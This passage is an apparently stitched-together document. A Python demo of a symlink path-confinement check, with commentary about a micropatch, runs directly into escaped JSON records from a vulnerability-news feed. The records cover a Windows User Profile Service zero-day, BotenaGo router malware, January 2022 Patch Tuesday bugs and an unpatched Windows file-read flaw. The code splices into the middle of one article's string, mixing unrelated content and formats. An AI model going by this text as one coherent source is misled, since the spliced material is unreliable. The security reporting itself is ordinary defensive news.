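    plays in the micropatch) and reject it if it no longer lies under `base`."""
    base_real = os.path.realpath(base)
    dest_real = os.path.realpath(os.path.join(base, dest_rel))
    return os.path.commonpath([base_real, dest_real]) != base_real


def evaluate(base: str, dest_rel: str) -> dict:
    """Run all three checks on one destination and report each verdict."""
    return {
        "top_level_only": top_level_only_check(base, dest_rel),
        "any_component": any_component_check(base, dest_rel),
        "escapes_base": escapes_base(base, dest_rel),
    }


def demo() -> dict:
    """Build a constructed profile tree and run the checks on a benign
    destination and on one whose second component is an attacker symlink."""
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "Users", "TEMP")              # stand-in for C:\Users\TEMP
        system_dir = os.path.join(root, "Windows", "System32")  # stand-in system location
        os.makedirs(base)
        os.makedirs(system_dir)
        # The top-level folder is a real directory; the link sits one level
        # down, exactly where the original fix did not look.
        os.makedirs(os.path.join(base, "AppData"))
        os.symlink(system_dir, os.path.join(base, "AppData", "Local"),
                   target_is_directory=True)
        malicious = os.path.join("AppData", "Local", "Microsoft", "payload")
        benign = os.path.join("Desktop", "docs")
        return {"malicious": evaluate(base, malicious),
                "benign": evaluate(base, benign)}


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Running `demo()` shows the gap: for the malicious layout the top-level check returns `False` (it would have let the copy proceed), while the per-component walk and the resolved-path test both return `True`. Resolving the final path and confining it to the profile root is the more robust of the two, because it also catches redirections that a per-component walk cannot classify (for example a component replaced by a junction between the check and the use, which is the race the article mentions); in a real service that resolution must be done on an open handle rather than on a string, which is precisely why the micropatch goes through `GetFinalPathNameByHandle`.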
Sponsored by Specops._**\n\n[**_Register NOW_**](<https://bit.ly/3bBMX30>)_** for the LIVE event!**_\n", "cvss3": {}, "published": "2021-11-12T19:49:05", "type": "threatpost", "title": "Windows 10 Privilege-Escalation Zero-Day Gets Unofficial Fix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-0146", "CVE-2021-34484"], "modified": "2021-11-12T19:49:05", "id": "THREATPOST:84909E392F4171398A52202CCC4E215A", "href": "https://threatpost.com/windows-10-privilege-escalation-zero-day-unofficial-fix/176313/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-15T21:22:33", "description": "Newly surfaced malware that is difficult to detect and written in Google\u2019s open-source programming language has the potential to [exploit millions](<https://threatpost.com/bug-iot-millions-devices-attackers-eavesdrop/168729/>) of routers and [IoT devices](<https://threatpost.com/iot-attacks-doubling/169224/>), researchers have found.\n\nDiscovered by researchers at AT&T AlienLabs, BotenaGo can exploit more than 30 different vulnerabilities to attack a target, Ofer Caspi, a security researcher at Alien Labs, wrote in a [blog post](<https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits>) published Thursday.\n\nThe malware, which is written in [Golang](<https://golang.org/>)\u2014a language Google first published in 2007\u2013works by creating a backdoor to the device. 
It then waits to either receive a target to attack from a remote operator through port 19412 or from another related module running on the same machine, he wrote.\n\n[](<https://threatpost.com/webinars/multi-cloud-security-and-visibility-an-intro-to-osquery-and-cloudquery/?utm_source=uptycs&utm_medium=email&utm_campaign=event&utm_id=uptycs&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\nGolang, also known as Go, is aimed at simplifying how software is built by making it easy for developers to compile the same code for different systems. This feature may be the reason why it\u2019s caught on with malware developers in the last few years, since it also makes it easier for attackers to spread malware on multiple operating systems, Caspi wrote.\n\nIndeed, [research from Intezer](<https://www.intezer.com/blog/malware-analysis/year-of-the-gopher-2020-go-malware-round-up/>), which offers a platform for analyzing malware, suggests that there has been a 2,000 percent increase in malware code written in Go being found in the wild, he wrote.\n\nResearchers said at this time they don\u2019t know which threat actor or actors developed BotenaGo, nor the full scale of devices that are vulnerable to the malware. So far, antivirus protections also don\u2019t seem to recognize the malware, sometimes misidentifying it as a [variant of Mirai malware](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>), Caspi wrote.\n\n## **Setting Up the Attack**\n\nBotenaGo commences its work with some exploratory moves to see if a device is vulnerable to attack, Caspi wrote. It starts by initializing global infection counters that will be printed to the screen, informing the attacker about total successful infections. The malware then looks for the \u2018dlrs\u2019 folder in which to load shell scripts files. 
If this folder is missing, BotenaGo stops the infection process.\n\nIn its last step before fully engaging, BotenaGo calls the function \u2018scannerInitExploits\u2019, \u201cwhich initiates the malware attack surface by mapping all offensive functions with its relevant string that represent the targeted system,\u201d Caspi wrote.\n\n[](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/?utm_source=Specops+&utm_medium=web&utm_campaign=event&utm_id=Specops+&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\nOnce it establishes that a device is vulnerable to attack, BotenaGo proceeds with exploit delivery by first querying the target with a simple \u201cGET\u201d request. It then searches the returned data from the \u201cGET\u201d request with each system signature that was mapped to attack functions.\n\nResearchers detail several possible attacks that can be carried out using this query. In one, the malware maps the string \u201cServer: Boa/0.93.15\u201d to the function \u201cmain_infectFunctionGponFiber,\u201d which attempts to exploit a vulnerable target, Caspi wrote.\n\nThis allows the attacker to execute an OS command via a specific web request using a vulnerability tracked as [CVE-2020-8958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8958>). A [SHODAN search](<https://www.shodan.io/>) turned up nearly 2 million devices that are vulnerable to this type of attack alone, he wrote.\n\n\u201cIn total, the malware initiates 33 exploit functions that are ready to infect potential victims,\u201d Caspi wrote. A full list of the vulnerabilities that BotenaGo can exploit is included in the post.\n\n## **Backdooring Devices to Execute Commands**\n\nThere are two different ways that the malware can receive commands to target victims, researchers found. 
One is to create backdoor ports\u201331421 and 19412\u2014that are used in an attack scenario, Caspi wrote.\n\n\u201cOn port 19412 it will listen to receive the victim IP,\u201d he wrote. \u201cOnce a connection with information to that port is received, it will loop through mapped exploit functions and execute them with the given IP.\u201d\n\nThe second way BotenaGo can receive a target command is by setting a listener to system IO (terminal) user input, getting the command to the device that way, Caspi explained.\n\n\u201cFor example, if the malware is running locally on a virtual machine, a command can be sent through telnet,\u201d he wrote.\n\n## **Dangers to Corporate Network**\n\nGiven its ability to exploit devices connected over internet ports, BotenaGo can be potentially dangerous to corporate networks by gaining access through vulnerable devices, said one security professional.\n\n\u201cBad actors, such as those at work here, love to exploit these devices to gain access to the internal networks behind them, or just to use it as a platform from which to launch other attacks,\u201d observed Erich Kron, security awareness advocate at security firm [KnowBe4](<http://www.knowbe4.com/>), in an email to Threatpost.\n\nAttacks that can be launched once a hacker takes over a device and piggybacks on the network it\u2019s using include [DDoS attacks](<https://threatpost.com/ddos-attacks-records-q3/176082/>), which can lead to extortion of money from victims, he said. Attackers also can host and spread malware using a victim\u2019s internet connection, Kron observed.\n\nGiven the number of vulnerabilities of which it can take advantage, BotenaGo also shows the importance of keeping IoT and routers updated with the latest firmware and patches to avoid leaving them available to exploit, he added.\n\n_**Want to win back control of the flimsy passwords standing between your network and the next cyberattack? 
Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, **_[**\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d**](<https://bit.ly/3bBMX30>)_** on Wed., Nov. 17 at 2 p.m. ET. Sponsored by Specops.**_\n\n[**Register NOW**](<https://bit.ly/3bBMX30>)_** for the LIVE event and submit questions ahead of time to Threatpost\u2019s Becky Bracken at **_[**becky.bracken@threatpost.com**](<mailto:becky.bracken@threatpost.com>)_**.**_\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-12T13:14:44", "type": "threatpost", "title": "Millions of Routers, IoT Devices at Risk from BotenaGo Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8958", "CVE-2021-0146", "CVE-2021-34484"], "modified": "2021-11-12T13:14:44", "id": "THREATPOST:95B32358658F5FEFA1715F69C5D6051D", "href": "https://threatpost.com/routers-iot-open-source-malware/176270/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-12T01:28:08", "description": 
"Microsoft has addressed a total of 97 security vulnerabilities in its January 2022 Patch Tuesday update \u2013 nine of them rated critical \u2013 including six that are listed as publicly known zero-days.\n\nThe fixes [cover a swath](<https://msrc.microsoft.com/update-guide/>) of the computing giant\u2019s portfolio, including: Microsoft Windows and Windows Components, Microsoft Edge (Chromium-based), Exchange Server, Microsoft Office and Office Components, SharePoint Server, .NET Framework, Microsoft Dynamics, Open-Source Software, Windows Hyper-V, Windows Defender, and Windows Remote Desktop Protocol (RDP).\n\n\u201cThis is an unusually large update for January,\u201d Dustin Childs, a researcher with Trend Micro\u2019s Zero Day Initiative (ZDI), explained. \u201cOver the last few years, the average number of patches released in January is about half this volume. We\u2019ll see if this volume continues throughout the year. It\u2019s certainly a change from the smaller releases that ended 2021 [Microsoft [patched 67 bugs](<https://threatpost.com/exploited-microsoft-zero-day-spoofing-malware/177045/>) in December].\u201d\n\n## **Zero-Day Tsunami**\n\nNone of the zero-days are listed as being actively exploited, though two (CVE-2022-21919 and CVE-2022-21836) have public exploit code available. 
They are:\n\n * [**CVE-2021-22947**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-22947>): HackerOne-assigned CVE in open-source Curl library (RCE)\n * [**CVE-2021-36976**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36976>): MITRE-assigned CVE in open-source Libarchive (RCE)\n * [**CVE-2022-21874**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21874>): Local Windows Security Center API (RCE, CVSS score of 7.8)\n * [**CVE-2022-21919**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21919>): Windows User Profile Service (privilege escalation, CVSS 7.0)\n * [**CVE-2022-21839**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21839>): Windows Event Tracing Discretionary Access Control List (denial-of-service, CVSS 6.1).\n * [**CVE-2022-21836**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21836>): Windows Certificate (spoofing, CVSS 7.8).\n\n\u201cThe [cURL bug] was actually disclosed by HackerOne back in September 2021,\u201d Childs said in ZDI\u2019s Patch Tuesday [analysis](<https://www.zerodayinitiative.com/blog/2022/1/11/the-january-2022-security-update-review>). \u201cThis patch includes the latest cURL libraries into Microsoft products. This is why this CVE is listed as publicly known. Similarly, the patch for the Libarchive library was also disclosed in 2021, and the latest version of this library is now being incorporated into Microsoft products.\u201d\n\n## **Patch Immediately: Critical, Wormable Bug**\n\nOut of the critical bugs, a remote code-execution (RCE) issue in the HTTP protocol stack stands out for researchers, given that it\u2019s wormable \u2013 i.e., an exploit could self-propagate through a network with no user interaction. 
It carries the most severe CVSS vulnerability-severity rating of the entire update, coming in at 9.8 on the 10-point scale.\n\nThe bug **([CVE-2022-21907](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21907>))** can be exploited by sending specially crafted packets to a system using the HTTP protocol stack (http.sys) to process packets.\n\n\u201cThe CVE targets the HTTP trailer support feature, which allows a sender to include additional fields in a message to supply metadata, by providing a specially-crafted message that can lead to remote code execution,\u201d Danny Kim, principal architect at Virsec, explained via email.\n\n\u201cNo user interaction, no privileges required and an elevated service add up to a wormable bug,\u201d Childs warned. \u201cWhile this is definitely more server-centric, remember that Windows clients can also run http.sys, so all affected versions are affected by this bug. Test and deploy this patch quickly.\u201d\n\nKim noted that CVE-2022-21907 is a particularly dangerous CVE because of its ability to allow for an attack to affect an entire intranet once the attack succeeds.\n\n\u201cThe CVE is the latest example of how software capabilities can be warped and weaponized,\u201d he noted. 
\u201cAlthough Microsoft has provided an official patch, this CVE is another reminder that software features allow opportunities for attackers to misuse functionalities for malicious acts.\u201d\n\n## **Other Critical Security Holes for January 2022 \u2013 One Unpatched**\n\nAnother interesting critical-rated RCE issue is **[CVE-2022-21840](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21840>)** in Microsoft Office, which, importantly, does not yet have a patch for Office 2019 for Mac and Microsoft Office LTSC for Mac 2021 (CVSS 8.8).\n\n\u201cMost Office-related RCE bugs are important-severity since they require user interaction and often have warning dialogs, too,\u201d said Childs, noting that the Preview Pane is not the attack vector. \u201cInstead, this bug is likely critical due to the lack of warning dialogs when opening a specially crafted file.\u201d\n\nMicrosoft also patched **[CVE-2022-21846](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21846>)** \u2013 a critical RCE bug in Microsoft Exchange Server reported by the National Security Agency, which is listed as \u201cexploitation more likely\u201d (CVSS 9.0). 
It\u2019s one of three Exchange RCEs being fixed this month (the others are CVE-2022-21969 and CVE-2022-21855), all of which are listed as being \u201cnetwork adjacent,\u201d meaning the attacker would need to be on a target network already to be successful.\n\nDespite the \u201cexploitation more likely\u201d rating, \u201cMicrosoft notes the attack vector is adjacent, meaning exploitation will require more legwork for an attacker, unlike the ProxyLogon and ProxyShell vulnerabilities which were remotely exploitable,\u201d Satnam Narang, staff research engineer at Tenable, said via email.\n\nOne of the zero-days is listed as critical too, it should be noted: **[CVE-2021-22947](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-22947>)**, which is the one found in the open-source cURL library used by Windows to transfer data using various network protocols. It allows RCE leading to man-in-the-middle (MiTM) attacks, according to Automox researcher Maarten Buis.\n\n\u201cAn attacker could carry out a MitM attack by exploiting how cURL handles cached or pipelined responses from IMAP, POP3, SMTP or FTP servers,\u201d he explained in [a Tuesday posting](<https://blog.automox.com/automox-experts-weigh-in-january-patch-tuesday-2022>). \u201cThe attacker would inject the fake response, then pass through the TLS traffic from the legitimate server and trick curl into sending the attackers\u2019 data back to the user as valid and authenticated.\u201d\n\nThe public disclosure significantly increases the chances of exploit, he warned.\n\nAnd, a privilege-escalation issue is unusually flagged as critical: **[CVE-2022-21857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21857>)** in Active Directory Domain Services (CVSS 8.8).\n\n\u201cThis patch fixes a bug that allowed attackers to elevate privileges across an Active Directory trust boundary under certain conditions,\u201d Childs said. 
\u201cMicrosoft deemed the flaw sufficient enough for a critical rating. This does require some level of privileges, so again, an insider or other attacker with a foothold in a network could use this for lateral movement and maintaining a presence within an enterprise.\u201d\n\nThere\u2019s another critical privilege-escalation issue, **[CVE-2022-21833](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21833>)** in the Virtual Machine IDE Drive (CVSS 7.8), but the complexity is marked high. According to Automox, a threat actor would first need access to an underprivileged account, such as through an unsecure user password or an account with minimal access controls, to exploit this vulnerability.\n\nThus, \u201cseeing this bug in the wild would likely take quite a bit of work,\u201d Childs said.\n\nTwo critical issues in the DirectX Graphics Kernel carry a rating of 7.8 out of 10 on the CVSS vulnerability-severity scale and allow RCE: **[CVE-2022-21912](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21912>)** and **[CVE-2022-21898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21898>)**.\n\nViewing a specially crafted media file could result in code execution, and the vulnerable components are likely present on most systems, according to Automox researcher Jay Goodman.\n\n\u201cThe DirectX graphics kernel is a subsystem that enables internal components like graphics cards and drives or external devices like printers and input devices,\u201d he said. \u201cAttackers could use these remote code execution vulnerabilities to deploy and execute code on a target system. This can allow attackers to easily take full control of the system as well as create a base of operations within the network to spread to other systems. Common and widespread vulnerabilities like these are critical for attackers trying to steal corporate data or infiltrating sensitive systems. 
It is important for organizations to patch and remediate within the 72 hour window to minimize exposure.\u201d\n\nAnd finally, there\u2019s **[CVE-2022-21917](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21917>)** in HEVC Video Extensions (RCE, CVSS 7.8).\n\n\u201cSuccessful exploitation would require an attacker to bait an authenticated user into opening a maliciously crafted media file, which would result in remote code execution on the victim\u2019s machine,\u201d explained Automox researcher Justin Knapp. \u201cMicrosoft does not provide mitigation recommendations aside from patching. However, most affected customers will automatically be updated via the Microsoft Store and guidance is provided to check the package version to ensure it has the current update.\u201d\n\nThe monster Patch Tuesday couldn\u2019t come at a worse time, noted Bharat Jogi, director of vulnerability and threat research at Qualys.\n\n\u201cThis massive Patch Tuesday comes during a time of chaos in the security industry whereby professionals are working overtime to remediate Log4Shell \u2013 reportedly the worst vulnerability seen in decades,\u201d he said via email. \u201cUnpredictable events such as Log4Shell add significant stress to the security professionals dealing with such outbreaks.\u201d\n\n**_Password_**_ _**_Reset: [On-Demand Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):_**_ Fortify 2022 with a password-security strategy built for today\u2019s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken. 
_**_[Register & stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)_**_ \u2013 sponsored by Specops Software._\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T21:54:57", "type": "threatpost", "title": "Microsoft Faces Wormable, Critical RCE Bug & 6 Zero-Days", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21836", "CVE-2022-21839", "CVE-2022-21840", "CVE-2022-21846", "CVE-2022-21855", "CVE-2022-21857", "CVE-2022-21874", "CVE-2022-21898", "CVE-2022-21907", "CVE-2022-21912", "CVE-2022-21917", "CVE-2022-21919", "CVE-2022-21969"], "modified": "2022-01-11T21:54:57", "id": "THREATPOST:05E04E358AB0AB9A5BF524854B34E49D", "href": "https://threatpost.com/microsoft-wormable-critical-rce-bug-zero-day/177564/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "thn": [{"lastseen": "2022-05-09T12:37:52", "description": 
"[](<https://thehackernews.com/new-images/img/a/AVvXsEiL_ZBAXmRadIpTCtIL6ko2RhRBQ3M8KOXg7jLdsxCjWl-V2Hk47PVfsYkcW-ZGiMl6CyhTYXcxIFCB3jWTn6ByqP9laZRQ3JiUFSBvb-fc_RWVEwQdJNgKNOxDwYPGv55yleW0ySMgaRuaksIn50zw3gG563opnN_wxTB8iSMcvhUeQ17KH-AY68rs>)\n\nUnofficial patches have been issued to remediate an improperly patched Windows security vulnerability that could allow information disclosure and local privilege escalation (LPE) on vulnerable systems.\n\nTracked as [CVE-2021-24084](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24084>) (CVSS score: 5.5), the flaw concerns an information disclosure vulnerability in the Windows Mobile Device Management component that could enable an attacker to gain unauthorized file system access and read arbitrary files.\n\nSecurity researcher Abdelhamid Naceri was credited with discovering and reporting the bug in October 2020, prompting Microsoft to address the issue as part of its February 2021 Patch Tuesday updates.\n\nBut as [observed](<https://halove23.blogspot.com/2021/06/CVE-2021-24084-Unpatched-ID.html>) by Naceri in June 2021, not only could the patch be bypassed to achieve the same objective, the researcher this month found that the incompletely patched vulnerability could also be [exploited](<https://twitter.com/KLINIX5/status/1455500874596356098>) to gain administrator privileges and run malicious code on Windows 10 machines running the [latest security updates](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>).\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgMZQpplV3ZiAcHEwmMtQcHAz3YyxyHAiW5jeWeu9T3hsQp50k-M3uoVMRHw8T9mtaGFHLoV6lAfluit3rHY6ojhU5kaukhNj_aHGxKMo2fteTd2XFcRIglOh3Ge34soXm23wwNDq0H_DeD786rYBCsEqBbia1jy1cBQSY3C7lv4NT8Ms-LiBp5S_UP>)\n\n\"Namely, as [HiveNightmare/SeriousSAM](<https://thehackernews.com/2021/07/new-windows-and-linux-flaws-give.html>) has taught us, an arbitrary file disclosure can be upgraded to local privilege escalation if you know which files 
to take and what to do with them,\" 0patch co-founder Mitja Kolsek [said](<https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html>) in a post last week.\n\nHowever, it's worth noting that the vulnerability can be exploited to accomplish privilege escalation only under specific circumstances, namely when the system protection feature is enabled on C: Drive and at least one local administrator account is set up on the computer.\n\nNeither Windows Servers nor systems running Windows 11 are affected by the vulnerability, but the following Windows 10 versions are impacted \u2014\n\n * Windows 10 v21H1 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v20H2 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v2004 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1909 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1903 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1809 (32 & 64 bit) updated with May 2021 Updates\n\nCVE-2021-24084 is also the third zero-day Windows vulnerability to rear its head again as a consequence of an incomplete patch issued by Microsoft. Earlier this month, 0patch [shipped](<https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html>) unofficial fixes for a local privilege escalation vulnerability ([CVE-2021-34484](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484>)) in the Windows User Profile Service that enables attackers to gain SYSTEM privileges.\n\nThen last week, Naceri disclosed details of another zero-day flaw in the Microsoft Windows Installer service ([CVE-2021-41379](<https://thehackernews.com/2021/11/warning-hackers-exploiting-new-windows.html>)) that could be bypassed to achieve elevated privileges on devices running the latest Windows versions, including Windows 10, Windows 11, and Windows Server 2022.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-30T09:11:00", "type": "thn", "title": "Unpatched Unauthorized File Read Vulnerability Affects Microsoft Windows OS", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084", "CVE-2021-34484", "CVE-2021-41379"], "modified": "2021-12-03T03:42:06", "id": "THN:BABD510622DAA320F3F1F55EEDD7549A", "href": "https://thehackernews.com/2021/11/unpatched-unauthorized-file-read.html", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2022-05-09T12:37:43", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjhBjNHjU-yR3MwrRHvUS9tDvlmZ8hZdIuBZLlTiLvekhf4svlWJy4OELJMXg06rTqKY-p4BvsU0T8jjJl6NFi3ByDa_8Bm2AEF0p-kQEfufx4DTJRrPfnWneln3r_fQXG0mtIGvUKcm_8SWaGbR_SFykKEZokaVBdGvVTWLiVQgnyK_Ae02rDLl0eF>)\n\nMicrosoft on Tuesday kicked off its first set of updates for 2022 by [plugging 96 security 
holes](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jan>) across its software ecosystem, while urging customers to prioritize patching for what it calls a critical \"wormable\" vulnerability.\n\nOf the 96 vulnerabilities, nine are rated Critical and 89 are rated Important in severity, with six zero-day publicly known at the time of the release. This is in addition to [29 issues](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) patched in Microsoft Edge on January 6, 2022. None of the disclosed bugs are listed as under attack.\n\nThe patches cover a swath of the computing giant's portfolio, including Microsoft Windows and Windows Components, Exchange Server, Microsoft Office and Office Components, SharePoint Server, .NET Framework, Microsoft Dynamics, Open-Source Software, Windows Hyper-V, Windows Defender, and Windows Remote Desktop Protocol (RDP).\n\nChief among them is [CVE-2022-21907](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907>) (CVSS score: 9.8), a remote code execution vulnerability rooted in the HTTP Protocol Stack. 
\"In most situations, an unauthenticated attacker could send a specially crafted packet to a targeted server utilizing the HTTP Protocol Stack (http.sys) to process packets,\" Microsoft noted in its advisory.\n\nRussian security researcher Mikhail Medvedev has been credited with discovering and reporting the error, with the Redmond-based company stressing that it's wormable, meaning no user interaction is necessary to trigger and propagate the infection.\n\n\"Although Microsoft has provided an official patch, this CVE is another reminder that software features allow opportunities for attackers to misuse functionalities for malicious acts,\" Danny Kim, principal architect at Virsec, said.\n\nMicrosoft also resolved six zero-days as part of its Patch Tuesday update, two of which are an integration of third-party fixes concerning the open-source libraries curl and libarchive.\n\n * [CVE-2021-22947](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-22947>) (CVSS score: N/A) \u2013 Open-Source curl Remote Code Execution Vulnerability\n * [CVE-2021-36976](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36976>) (CVSS score: N/A) \u2013 Open-Source libarchive Remote Code Execution Vulnerability\n * [CVE-2022-21836](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21836>) (CVSS score: 7.8) \u2013 Windows Certificate Spoofing Vulnerability\n * [CVE-2022-21839](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21839>) (CVSS score: 6.1) \u2013 Windows Event Tracing Discretionary Access Control List Denial of Service Vulnerability\n * [CVE-2022-21874](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21874>) (CVSS score: 7.8) \u2013 Windows Security Center API Remote Code Execution Vulnerability\n * [CVE-2022-21919](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21919>) (CVSS score: 7.0) \u2013 Windows User Profile Service Elevation of Privilege 
Vulnerability\n\nAnother critical vulnerability of note concerns a remote code execution flaw ([CVE-2022-21849](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21849>), CVSS score: 9.8) in Windows Internet Key Exchange ([IKE](<https://en.wikipedia.org/wiki/Internet_Key_Exchange>)) version 2, which Microsoft said could be weaponized by a remote attacker to \"trigger multiple vulnerabilities without being authenticated.\"\n\nOn top of that, the patch also remediates a number of remote code execution flaws affecting Exchange Server, Microsoft Office ([CVE-2022-21840](<https://cve-2022-21840>)), SharePoint Server, RDP ([CVE-2022-21893](<https://www.cyberark.com/resources/threat-research-blog/attacking-rdp-from-inside>)), and Windows Resilient File System as well as privilege escalation vulnerabilities in Active Directory Domain Services, Windows Accounts Control, Windows Cleanup Manager, and Windows Kerberos, among others.\n\nIt's worth stressing that CVE-2022-21907 and the three shortcomings uncovered in [Exchange Server](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) ([CVE-2022-21846](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21846>), [CVE-2022-21855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21855>), and [CVE-2022-21969](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21969>), CVSS scores: 9.0) have all been labeled as \"exploitation more likely,\" necessitating that the patches are 